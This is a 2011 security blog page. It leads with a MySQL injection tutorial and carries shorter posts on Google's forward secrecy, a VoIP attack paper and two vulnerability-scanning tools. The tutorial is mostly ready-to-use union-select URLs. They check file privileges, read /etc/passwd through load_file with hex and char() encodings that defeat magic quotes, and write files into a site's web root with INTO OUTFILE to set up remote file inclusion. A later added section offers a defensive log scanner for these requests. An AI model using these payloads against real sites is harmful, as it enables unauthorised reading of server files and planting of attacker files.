Thursday 24 November 2011

MySQL Injection - Simple Load File and Into OutFile

Introduction

If you already know basic MySQL injection, you can follow this tutorial...

Now let's see what Load File and Into OutFile are.

-- What are Load File and Into OutFile?
They are MySQL syntax elements (used in MySQL injections).

Load File: reads the file and returns the file contents as a string.
Into OutFile: writes the selected rows to a file. The file is created on the server host, so you must have the FILE privilege to use this syntax. The file to be written cannot be an existing file, which among other things prevents files (such as "/etc/passwd") and database tables from being destroyed.
(... from: MySQL.com)

Ok, let's begin now!

-

Access to "mysql.user" table and file privileges

If you are using the MySQL injection method, then before you look for the target table (and columns), check whether you have access to the "mysql.user" table.
To do so, replace one visible column in the URL (i.e. a number that is shown on the page) with the string "user" to see the user name.

Let's see our example:
http://vulnsite.com/index.php?id=-1+union+all+select+1,user,3,4+from+mysql.user--
In our example, column (number) 2 is visible on the vulnerable page.

If the page returns a user name where that visible column is shown, that's good: you have access to the "mysql.user" table and can continue with this tutorial. Remember the user name you have seen!

In our example that happens (we have access to the "mysql.user" table), so we can now check whether we have file privileges.
Replace "user" in the URL with the string "group_concat(user,0x3a,file_priv)" to check whether you have file privileges on the vulnerable site.

Here is our example:
http://vulnsite.com/index.php?id=-1+union+all+select+1,group_concat(user,0x3a,file_priv),3,4+from+mysql.user--

Where the visible column was shown, the page now lists users and their file privileges (in the format User name:File privilege, ...). Find the user name you saw before and look at the value to its right: "Y" (Yes) means you have file privileges (and can continue with this tutorial); "N" (No) means you don't.
In our example we have file privileges (of course): "... ,ouruser:Y, ...".

Let's go now to the next part.

-

Using Load File syntax

Load File is useful when you want to read (configuration) files (similar to LFI - Local File Inclusion), e.g. "/etc/passwd", "/etc/shadow", etc.

Syntax is: load_file('FILE')

Here is our example, reading the "/etc/passwd" file:
http://vulnsite.com/index.php?id=-1+union+all+select+1,load_file('/etc/passwd'),3,4+from+mysql.user--
In place of column (number) 2, the page will show the contents of the "/etc/passwd" file.

Note 1: "../" means move one directory up.

Note 2: If you get an error when you try to read a file, magic quotes are enabled (PHP adds a backslash before each "'" symbol). To avoid that, convert the file name (i.e. the string) to Hex or Char and then remove the "'" symbols:

For Hex: always put "0x" before the hex string (with no spaces), and the final string must not contain any spaces; e.g. (Load File - "/etc/passwd"): load_file(0x2f6574632f706173737764)

For Char: the usage is char(NUMBERS,NUMBERS,NUMBERS...); if the converted text contains spaces between the numbers, replace all of them with commas; e.g. (Load File - "/etc/passwd"): load_file(char(47,101,116,99,47,112,97,115,115,119,100))
By the way, here is a text-to-Hex and text-to-Char converter:
http://home2.paulschou.net/tools/xlate/

That's all for Load File syntax.

-

Using Into OutFile syntax

Into OutFile is useful when you want to write a file on the vulnerable site/server, e.g. a simple PHP file that is vulnerable to RFI (Remote File Inclusion), and then exploit that hole...

Syntax is: INTO OUTFILE 'FILE'
Note 1: This syntax must always be at the end of the query (like the table name)! E.g. ...+INTO+OUTFILE+'/FILE'--
To write your text into your file on the vulnerable site/server, replace one visible column in the URL (i.e. a number that is shown on the page) with your text, in quotes...

Let's see our example: we want to write the text "testing" into the file "test.txt" in the site directory on our vulnerable site/server:
http://vulnsite.com/index.php?id=-1+union+all+select+1,"testing",3,4+INTO+OUTFILE+'/home/vulnsite/www/test.txt'--

Note 2:
If you have two or more visible columns (i.e. numbers that are shown on your vulnerable page), replace the other visible columns (i.e. numbers in the URL) with the word "null"! (If you don't, those numbers will be written into your file together with your text.)
In our example the visible columns are 2 and 3, so we must replace column 3:
http://vulnsite.com/index.php?id=-1+union+all+select+1,"testing",null,4+INTO+OUTFILE+'/home/vulnsite/www/test.txt'--
 
Then, if the page loads normally (without any errors), the file has been created successfully, and its location on the vulnerable site/server will be:
http://vulnsite.com/test.txt

Note 3: If you want a line break (Return/Enter) in the text to be written to your file, type the text in the converter/translator and convert it to Hex or Char...

Note 4: You must write all your files into the site path, otherwise the Into OutFile syntax won't work.

Note 5: If the page is blank (i.e. shows an error) where your text should appear, magic quotes are enabled (PHP adds a backslash before each "'" symbol). To avoid that, convert the text (i.e. string) to Hex or Char and then remove the "'" symbols - see the explanation and converter link at the end of part 3...

Warning: Don't convert your file name into Hex or Char, otherwise it won't work (this applies only to the Into OutFile syntax)! And if the vulnerable site has magic quotes enabled, the Into OutFile syntax will not work at all.
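For defenders, an added example that is not part of the original tutorial: a small Python scanner that runs over constructed web-server log lines and flags the requests the tutorial walks through (the mysql.user and file_priv probes, load_file(), INTO OUTFILE), decoding the 0x... and char() literals used to get around magic quotes so the file name involved is visible in the alert.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines for this example (not from the original post).
# The first four mirror the tutorial's requests; the last two are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [24/Nov/2011:10:01:02 +0000] "GET /index.php?id=-1+union+all+select+1,user,3,4+from+mysql.user-- HTTP/1.1" 200 512
10.0.0.5 - - [24/Nov/2011:10:01:09 +0000] "GET /index.php?id=-1+union+all+select+1,group_concat(user,0x3a,file_priv),3,4+from+mysql.user-- HTTP/1.1" 200 530
10.0.0.5 - - [24/Nov/2011:10:01:31 +0000] "GET /index.php?id=-1%20union%20all%20select%201,load_file(0x2f6574632f706173737764),3,4-- HTTP/1.1" 200 2048
10.0.0.5 - - [24/Nov/2011:10:02:10 +0000] "GET /index.php?id=-1+union+all+select+1,%22testing%22,null,4+INTO+OUTFILE+'/home/vulnsite/www/test.txt'-- HTTP/1.1" 200 512
10.0.0.9 - - [24/Nov/2011:10:03:00 +0000] "GET /index.php?id=42 HTTP/1.1" 200 7312
10.0.0.9 - - [24/Nov/2011:10:03:05 +0000] "GET /search.php?q=union+station+outfile HTTP/1.1" 200 900
"""
# One signature per step of the tutorial above.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "mysql_user_table": re.compile(r"\bmysql\.user\b", re.I),
    "file_priv_probe": re.compile(r"\bfile_priv\b", re.I),
    "load_file": re.compile(r"\bload_file\s*\(", re.I),
    "into_outfile": re.compile(r"\binto\s+outfile\b", re.I),
}
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-f]{2})+)\b", re.I)
CHAR_CALL = re.compile(r"\bchar\s*\(([\d\s,]+)\)", re.I)
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def decode_literals(text):
    """Recover strings hidden in 0x... and char(...) literals (the magic-quotes workaround)."""
    found = [bytes.fromhex(h).decode("latin-1") for h in HEX_LITERAL.findall(text)]
    for nums in CHAR_CALL.findall(text):
        found.append("".join(chr(int(n)) for n in nums.split(",") if n.strip()))
    return found

def analyse_request(line):
    """Return (signature hits, decoded literals) for one log line, or None if it holds no request."""
    m = REQUEST.search(line)
    if not m:
        return None
    # unquote_plus turns both '+' and %20 into spaces, as the web server/PHP would
    query = unquote_plus(urlsplit(m.group(1)).query)
    hits = [name for name, rx in SIGNATURES.items() if rx.search(query)]
    return hits, decode_literals(query)

def scan(log_text):
    """Return (line, hits, literals) for every request that matches at least one signature."""
    alerts = []
    for line in log_text.splitlines():
        result = analyse_request(line)
        if result and result[0]:
            alerts.append((line, result[0], result[1]))
    return alerts
```

On the database side, the preconditions the tutorial relies on are removed by not granting the FILE privilege to the web application's database account and by setting secure_file_priv to restrict (or disable) LOAD_FILE and INTO OUTFILE.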

Finish...

Wednesday 23 November 2011

Google Online Security Blog: Protecting data for the long term with forward secrecy

Last year we introduced HTTPS by default for Gmail and encrypted search. We’re pleased to see that other major communications sites are following suit and deploying HTTPS in one form or another. We are now pushing forward by enabling forward secrecy by default.

Most major sites supporting HTTPS operate in a non-forward secret fashion, which runs the risk of retrospective decryption. In other words, an encrypted, unreadable email could be recorded while being delivered to your computer today. In ten years' time, when computers are much faster, an adversary could break the server private key and retrospectively decrypt today’s email traffic.

Forward secrecy requires that the private keys for a connection are not kept in persistent storage. An adversary that breaks a single key will no longer be able to decrypt months’ worth of connections; in fact, not even the server operator will be able to retroactively decrypt HTTPS sessions.

Forward secret HTTPS is now live for Gmail and many other Google HTTPS services(*), like SSL Search, Docs and Google+. We have also released the work that we did on the open source OpenSSL library that made this possible. You can check whether you have forward secret connections in Chrome by clicking on the green padlock in the address bar of HTTPS sites. Google’s forward secret connections will have a key exchange mechanism of ECDHE_RSA.

We would very much like to see forward secrecy become the norm and hope that our deployment serves as a demonstration of the practicality of that vision.


(* Chrome, Firefox (all platforms) and Internet Explorer (Vista or later) support forward secrecy using elliptic curve Diffie-Hellman. Initially, only Chrome and Firefox will use it by default with Google services because IE doesn’t support the combination of ECDHE and RC4. We hope to support IE in the future.)
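As an added illustration (not from Google's post or its OpenSSL work): a Python check, using the standard ssl module, of whether a cipher suite name indicates an authenticated ephemeral key exchange, a client context restricted to such suites, and a connection test that reports the negotiated suite the way the Chrome padlock dialog does. The cipher string assumes an OpenSSL build that ships ECDHE AES-GCM suites.

```python
import socket
import ssl

def is_forward_secret(cipher_name):
    """True when the suite uses an authenticated ephemeral key exchange (ECDHE or DHE).
    Accepts OpenSSL names (ECDHE-RSA-AES128-GCM-SHA256, DHE-RSA-AES256-SHA,
    EDH-RSA-DES-CBC3-SHA) and IANA names (TLS_ECDHE_RSA_WITH_...).
    TLS 1.3 suites always use (EC)DHE, so they are forward secret by construction."""
    name = cipher_name.upper().replace("-", "_")
    if name.startswith(("TLS_AES_", "TLS_CHACHA20_")):
        return True
    # Static RSA (AES128_SHA) and static ECDH (ECDH_RSA_...) carry no "DHE"/"EDH" component.
    return "DHE_" in name or "EDH_" in name

def forward_secret_client_context():
    """Client context that only offers ephemeral key exchange for TLS <= 1.2
    (assumption: the local OpenSSL provides ECDHE+AESGCM suites)."""
    ctx = ssl.create_default_context()
    ctx.set_ciphers("ECDHE+AESGCM:ECDHE+CHACHA20:DHE+AESGCM")
    return ctx

def static_kex_suites(ctx):
    """Enabled suites that are not forward secret; empty for the context above."""
    return [c["name"] for c in ctx.get_ciphers() if not is_forward_secret(c["name"])]

def negotiated_kex(host, port=443):
    """Connect with the restricted context and return (cipher, TLS version, forward secret?).
    This needs network access; a server with only static RSA suites will refuse the handshake."""
    ctx = forward_secret_client_context()
    with socket.create_connection((host, port), timeout=10) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            name, version, _bits = tls.cipher()
            return name, version, is_forward_secret(name)
```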

Enumerating And Breaking VoIP

Source: packetstormsecurity. Whitepaper called Enumerating and Breaking VoIP. It discusses various enumeration techniques followed by a demonstration of a few VoIP attacks.
Tags: paper
MD5: 6f838df84fef711d5acd89d899314395
Download: enumerating_breaking_voip.pdf

w3af v.1.1 Released

Web Application Attack and Audit Framework

W3af is an extremely popular, powerful, and flexible framework for finding and exploiting web application vulnerabilities. It is easy to use and extend and features dozens of web assessment and exploitation plugins.

Changes:
* Considerably increased performance by implementing gzip encoding
* Enhanced embedded bug report system using Trac's XMLRPC
* Fixed hundreds of bugs
* Fixed critical bug in auto-update feature
* Enhanced integration with other tools (bug fixed and added more info to the file)

Download: http://sourceforge.net

PHP Vulnerability Hunter v.1.1.4.6

PHP Vulnerability Hunter is an advanced automated whitebox fuzz testing tool.

This is the application that detected almost all of the web application vulnerabilities listed on the advisories page. PHP Vulnerability Hunter is an advanced automated whitebox fuzz testing tool capable of triggering a wide range of exploitable faults in PHP web applications. Minimal configuration is necessary to begin a scan; PHP Vulnerability Hunter doesn’t even need a user specified starting URI.

ChangeLog:
Added code coverage report
Updated GUI validation
Several instrumentation fixes
Fixed lingering connection issue
Fixed GUI and report viewer crashes related to working directory

Download: http://code.google.com

More: http://www.autosectools.com/PHP-Vulnerability-Scanner